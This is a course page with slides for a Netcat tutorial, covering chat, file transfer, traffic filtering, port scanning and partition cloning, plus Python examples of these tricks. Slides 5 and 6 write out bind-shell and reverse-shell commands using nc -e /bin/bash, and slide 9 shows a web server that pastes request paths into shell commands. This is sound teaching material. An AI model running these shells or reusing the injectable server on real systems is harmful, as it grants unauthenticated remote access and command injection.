Exercise Session 1

In the exercise session of 13/11 we went through two exam papers. Here you can find the related files:

Slides of today's seminar

(use tpp to view them)

--author Giovanni Agosta
--title Netcat Tutorial
--date today

An introduction to Netcat, the TCP/IP Swiss Army Knife

--newpage intro
--heading What is Netcat?

  * Basically, Netcat opens a TCP (or UDP) connection to a given address and port

  * The connection then works as a pipe in both directions
     - Anything sent to stdin is copied to the stdout of the other machine, and vice versa

  * Thus, it serves a purpose similar to pipes, but allows processes on different machines to be composed

  * And now, 9 quick & dirty tricks with Netcat!

--newpage cat
--heading 1 Chat & File Transfer

nc -l -p <#port> 

nc localhost <#port>
nc <#address> <#port>

  * The first command listens (server side); either of the other two connects to it (client side)
  * Use redirection of stdin/stdout to perform file transfer
  * Use -q to force termination after end of input or a given time (-q is not available in every netcat build; check your nc's help output)
  * Communication is bidirectional
  * Nothing is encrypted or authenticated: whoever connects first to the listening port gets the data

--newpage socket
--heading 2 Handling Information Requests

You can make up a simple server that makes a piece of information available on a given port:

while true ; do cat /proc/loadavg | nc -l -p <#port> -q 1 > logfile.log ; done

  * This script returns the current content of the loadavg file from procfs to whoever connects; whatever the client sends ends up in logfile.log (overwritten at each connection)
  * -q 1 closes the connection one second after the end of input, so the loop moves on to the next client
  * It can be used to implement a quick and dirty version of process B from the exam of March 9, 2006

--newpage filter
--heading 3 Filter Network Traffic

Redirecting a stream arriving on a given port through filters and finally to the actual server, which has been set to listen on a different port.

mkfifo back
nc -l -p <#expectedport> 0<back | <infilter> | nc localhost <#actualport> | <outfilter> >back

  * Use a fifo to carry the backward dataflow: the server's replies, once filtered, are written to back, which the listening netcat reads as its stdin and sends on to the client
  * Use a netcat server and client pair to redirect the traffic
  * Use any program or script to filter incoming and outgoing data
  * Remember that programs such as sed fully buffer their output when it is a pipe (GNU sed has -u to avoid this), otherwise replies arrive late or in bursts
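The relay above, rebuilt as an added example (not code from the original slides) with Python sockets and threads instead of two netcats and a fifo, so it runs without netcat installed. A tiny echo server on loopback stands in for the real service on <#actualport>; the two constructed filters upper-case what the client sends and redact a hypothetical secret= field on the way back. Like the shell version, each filter sees raw TCP chunks rather than whole lines.

```python
import re
import socket
import threading


def pump(src, dst, filt):
    """Copy one direction src -> dst through filt until src hits EOF, then pass the
    EOF on. Two of these per connection replace <infilter> and the fifo 'back'."""
    while True:
        data = src.recv(4096)
        if not data:
            break
        dst.sendall(filt(data))
    try:
        dst.shutdown(socket.SHUT_WR)
    except OSError:
        pass


def listener():
    """A listening socket on an ephemeral loopback port (the nc -l -p side)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    s.listen(5)
    return s


def serve_one(srv, handler):
    """Accept one connection on srv in a background thread and hand it to handler."""
    def run():
        conn, _ = srv.accept()
        with conn:
            handler(conn)
    threading.Thread(target=run, daemon=True).start()


def start_echo_server():
    """Stand-in for the real service on <#actualport>: echoes whatever it receives."""
    srv = listener()
    serve_one(srv, lambda conn: pump(conn, conn, lambda b: b))
    return srv.getsockname()[1]


def start_filter_relay(actual_port, in_filter, out_filter):
    """Listen on <#expectedport>, connect to <#actualport>, one filter per direction."""
    srv = listener()

    def handle(client):
        with socket.create_connection(("127.0.0.1", actual_port)) as backend:
            back = threading.Thread(target=pump, args=(backend, client, out_filter))
            back.start()                       # server -> <outfilter> -> client
            pump(client, backend, in_filter)   # client -> <infilter> -> server
            back.join()

    serve_one(srv, handle)
    return srv.getsockname()[1]


def exchange(port, payload):
    """Like `nc localhost <#expectedport>`: send payload, return everything that comes back."""
    with socket.create_connection(("127.0.0.1", port)) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        out = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                return out
            out += chunk


# Constructed filters: shout on the way in, hide a hypothetical password field on the way out.
def shout(data):
    return data.upper()


def redact(data):
    return re.sub(rb"SECRET=\S+", b"SECRET=***", data)


if __name__ == "__main__":
    actual = start_echo_server()
    expected = start_filter_relay(actual, shout, redact)
    print(exchange(expected, b"hello secret=hunter2\n"))   # b'HELLO SECRET=***\n'
```

The backward pump thread does the job of the fifo: without it the listening side would have no way to send the filtered replies back to the client.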

--newpage scanning
--heading 4 Port Scanning

Finding open ports and the associated servers at a given address

nc -v -z -w 1 <#address> <#port>-<#port>

  * Scans all ports in a range at the given address
  * Sends and reads no data (-z): the connection is closed as soon as it is established
  * Gives up on a port after 1 second (-w 1), so a filtered port that never answers does not stall the scan
  * Prints out the ports that accepted the connection (using the verbose option)
  * Every open port sees a completed TCP handshake, so the scan shows up in the target's logs
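The connect scan behind the command above, as an added example (not code from the original slides) written with Python's socket module so it runs without netcat. A port counts as open when the TCP handshake completes; nothing is sent afterwards (-z) and each attempt is abandoned after a timeout (-w 1). hold_port() creates loopback targets to scan, so the demo works offline.

```python
import socket


def scan_ports(address, first_port, last_port, timeout=1.0):
    """Return the ports in [first_port, last_port] that accepted a TCP connection.

    -z equivalent: connect, then close without sending or reading a byte.
    -w 1 equivalent: a port that neither accepts nor refuses (a firewall dropping
    the SYN) is given up after `timeout` seconds instead of stalling the scan.
    """
    open_ports = []
    for port in range(first_port, last_port + 1):
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            try:
                s.connect((address, port))
            except OSError:        # ConnectionRefusedError (RST back) or timeout (no answer)
                continue
            open_ports.append(port)
    return open_ports


def hold_port(listen):
    """Bind an ephemeral loopback port. With listen=True the kernel completes handshakes
    (open); with listen=False the port is reserved but every SYN is refused (closed).
    Returns (socket, port); keep the socket referenced as long as the port is needed."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    if listen:
        s.listen(5)
    return s, s.getsockname()[1]


if __name__ == "__main__":
    open_sock, open_port = hold_port(listen=True)
    closed_sock, closed_port = hold_port(listen=False)
    # Scan a few ports around each target: the listener shows up, the refused port does not.
    print("around open  :", scan_ports("127.0.0.1", open_port - 1, open_port + 1))
    print("around closed:", scan_ports("127.0.0.1", closed_port, closed_port))
    open_sock.close()
    closed_sock.close()
```

Against a remote host the timeout is what keeps the scan moving: a refused port answers with an RST immediately, a filtered one never answers at all.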

--newpage telnet
--heading 5 Telnet

On the local machine
nc <#address> <#port>

On the remote machine
nc -l -p <#port> -e /bin/bash

  * You obtain a shell on the remote machine (a bind shell: the remote side listens, you connect to it)
  * -e only exists in netcat builds compiled with it (the GAPING_SECURITY_HOLE option), and anyone who can reach the port gets the same shell, with no authentication

--newpage reverse
--heading 6 Reverse Telnet 

On the local machine
nc -l -p <#port> -vv

On the remote machine
nc -vv <#address> <#port> -e /bin/bash

  * You obtain a shell on the remote machine, but this time the remote side connects out to you, so it works even when a firewall or NAT blocks inbound connections to the remote machine
  * Commands and output cross the network in clear: use cryptcat (netcat + blowfish) for such uses!

--newpage partition
--heading 7 Partition Cloning over the Network

Copying an entire partition to a different machine:

netcat -l -p <#port> | dd of=/dev/<#partition>
dd if=/dev/<#partition> | netcat <#address> <#port>

  * Uses dd to read and write to/from the partition
  * Start the receiving side (netcat -l) first, then the sender
  * Both partitions should be unmounted
  * The target partition must be at least as large as the source; compare a checksum of both partitions afterwards (e.g. with sha1sum) to verify the copy

--newpage search
--heading 8 Search Engine Querying

Querying the Google search engine:

echo -e "GET /search?q=Mystara HTTP/1.0\r\nHost: <#host>\r\nUser-Agent: Mozilla\r\n\r\n" | netcat <#host> 80 | sed -e 's/\(<a href[^<>]*>\)/\n\1\n/g' | grep href=\"http | grep -v google | grep -v cache | sed -e 's/<a href=\"\([^\"]*\)\"[^>]*>/\1/g'

Let's have a look at the individual filters

--newpage search2
--heading Search Engine Querying

echo -e "GET /search?q=Mystara HTTP/1.0\r\nHost: <#host>\r\nUser-Agent: Mozilla\r\n\r\n"

  * Build the query as an HTTP GET request: CRLF line endings, a Host header, and an empty line to end the headers
  * HTTP/1.0 makes the server close the connection after the reply, so netcat terminates on its own instead of waiting on a kept-alive connection
  * Specify a valid (although ultimately fake) user agent to avoid error messages such as "frames not supported"
  * Output the request to stdout

netcat <#host> 80

  * Redirect stdin to <#host> (the Google web server) at port 80
  * At the same time, copy the server's response to stdout

--newpage search3
--heading Search Engine Querying

sed -e 's/\(<a href[^<>]*>\)/\n\1\n/g'
sed -e 's/<a href=\"\([^\"]*\)\"[^>]*>/\1/g'

  * sed is a stream editor, runs as a filter
  * -e executes the following string as a sed script
  * s/<pattern>/<replacement>/g replaces every instance of the pattern within the input stream with the replacement string
  * \1 is a back-reference to the part of the pattern within \( \)
  * \n in the replacement inserts a line break (a GNU sed extension)

--newpage search4
--heading Search Engine Querying

  * Google's html comes without line breaks
  * The first sed filter puts each hyperlink on its own line 
  * Now we can grep for lines that contain a hyperlink

grep href=\"http | grep -v google | grep -v cache

  * But not an internal hyperlink (either cache or links to other Google services)
  * The second sed filter then strips the tag around the URL, leaving one URL per line
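The same query and link extraction done with Python sockets, as an added example (not code from the original slides). It runs offline against a throwaway HTTP server on loopback that serves a constructed results page (Google's real markup is not reproduced), and shows the two halves of the pipeline: a request of the kind netcat sends (HTTP/1.0, CRLF, Host header, read until the server closes) and a regular-expression equivalent of the sed/grep chain.

```python
import re
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed sample page: no line breaks, internal (google/cache) and external links mixed.
SAMPLE_HTML = (b'<html><body><a href="/search?q=Mystara&start=10">Next</a>'
               b'<a href="http://webcache.googleusercontent.com/cache?q=x">Cached</a>'
               b'<a href="http://www.google.com/intl/en/about.html">About</a>'
               b'<a href="http://pandius.com/" class="l">Vaults of Pandius</a>'
               b'<a href="http://www.wizards.com/dnd/">D&amp;D</a></body></html>')


def build_request(path, host, user_agent="Mozilla"):
    """An HTTP/1.0 request with CRLF line endings and a Host header; 1.0 so the server
    closes the connection after the reply and a netcat-style reader sees EOF."""
    return ("GET %s HTTP/1.0\r\nHost: %s\r\nUser-Agent: %s\r\n\r\n"
            % (path, host, user_agent)).encode("ascii")


def raw_get(host, port, path):
    """Send the request and read until the server closes: what `... | netcat host 80` does."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(build_request(path, host))
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", "replace")


def extract_links(html):
    """Equivalent of the sed/grep chain: every href starting with http, minus the
    Google-internal ones (anything mentioning google or cache), tag stripped."""
    links = re.findall(r'<a href="(http[^"]*)"[^>]*>', html)
    return [link for link in links if "google" not in link and "cache" not in link]


class SampleHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(SAMPLE_HTML)

    def log_message(self, *args):   # keep the demo quiet
        pass


def serve_sample():
    """Start the throwaway server on an ephemeral loopback port; returns (server, port)."""
    srv = HTTPServer(("127.0.0.1", 0), SampleHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


if __name__ == "__main__":
    srv, port = serve_sample()
    page = raw_get("127.0.0.1", port, "/search?q=Mystara")
    print(extract_links(page))   # ['http://pandius.com/', 'http://www.wizards.com/dnd/']
    srv.shutdown()
```

raw_get returns headers and body together, exactly as netcat would print them; extract_links only ever sees `<a href=...>` tags, so the headers do not get in the way.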

--newpage webserver
--heading 9 A Web Server

mkfifo p ; mkfifo f ; ( while true ; do cat f > p ; done ) &

while true ; do 
  nc -v -q 2 -l -p 8080 0<p | \
  grep -m1 GET | \
  sed -e 's/GET \/\([^ ]*\) HTTP[/0-9.]*/cat \/var\/www\/html\/\1 >f /ep ; q' \
  2>webserver.log ; 
done

  * nc reads its stdin from the fifo p and sends it to the client; f feeds p through the background cat, which must be restarted for every request because it sees EOF at the end of each file
  * grep -m1 keeps only the request line; sed rewrites it into a cat command and executes it (GNU sed's e flag), so the requested file flows into f, then p, then to the client
  * The reply carries no HTTP status line or headers: the file is sent raw
  * Quick & dirty indeed: the request path is pasted into a shell command without any check, so a path containing .. escapes /var/www/html and shell metacharacters in it are executed. Do not expose this outside a lab
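As an added example (not code from the original slides), what the sed rule above actually builds from a request line, next to a resolver that only ever returns a file name inside the document root. It is pure string and path logic on constructed request lines, so it runs without a network or a web root; the index.html name for a bare "/" is an assumption the slide does not make.

```python
import posixpath
import re
from urllib.parse import unquote

DOCROOT = "/var/www/html"        # the root the slide's sed script hard-codes
INDEX = "index.html"             # assumption: file served for a bare "/" (the slide has none)


def sed_command(request_line):
    """Reproduce the slide's substitution: whatever sits between 'GET /' and ' HTTP/x.y'
    is pasted verbatim into 'cat /var/www/html/<it> >f ', which sed's e flag then hands
    to the shell. Nothing is checked, so '..' and $(...) go straight to sh."""
    m = re.match(r"GET /([^ ]*) HTTP[/0-9.]*", request_line)
    return None if m is None else "cat %s/%s >f " % (DOCROOT, m.group(1))


def resolve_path(request_line, docroot=DOCROOT):
    """Return the file to serve for a GET request line, or None to refuse the request.

    Drops the query string, percent-decodes, rejects NUL, collapses '.' and '..' with
    posixpath.normpath, and refuses anything that would climb above docroot or name an
    absolute path. The result is meant for open(), never for a shell command line."""
    m = re.match(r"GET /([^ ]*) HTTP/1\.[01]\r?$", request_line)
    if m is None:
        return None
    target = unquote(m.group(1).split("?", 1)[0])
    if "\0" in target:
        return None
    rel = posixpath.normpath(target)
    if rel.startswith("/") or rel == ".." or rel.startswith("../"):
        return None                  # e.g. GET /../../etc/passwd or GET //etc/passwd
    if rel == ".":
        rel = INDEX                  # GET / HTTP/1.0
    return posixpath.join(docroot, rel)


if __name__ == "__main__":
    # Constructed request lines, including two the slide's version mishandles.
    for line in ("GET /index.html HTTP/1.1",
                 "GET /../../etc/passwd HTTP/1.0",
                 "GET /$(id) HTTP/1.1"):
        print(line, "->", sed_command(line), "|", resolve_path(line))
```

Note that "$(id)" survives the resolver as a literal file name: that is the point, a path is data to be opened, not text to be executed, so metacharacters stop mattering once no shell is involved.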

--newpage conclusion
--heading Conclusion

--center Like its namesake, netcat has (at least) 9 lives ;)

   /\_/\         Examples from:
  / 0 0 \          Few Useful Netcat Tricks (1-7)
 ====v====         the OpenBSD netcat documentation (8)
  \  W  /          and yours truly (9)
  |     |     _
  / ___ \    / 
 / /   \ \  |  
(      ___     
 \__.=|___E      (ascii art from
teaching/labsw/esercitazione_1.txt · Last modified: 2008/11/25 17:54 by agosta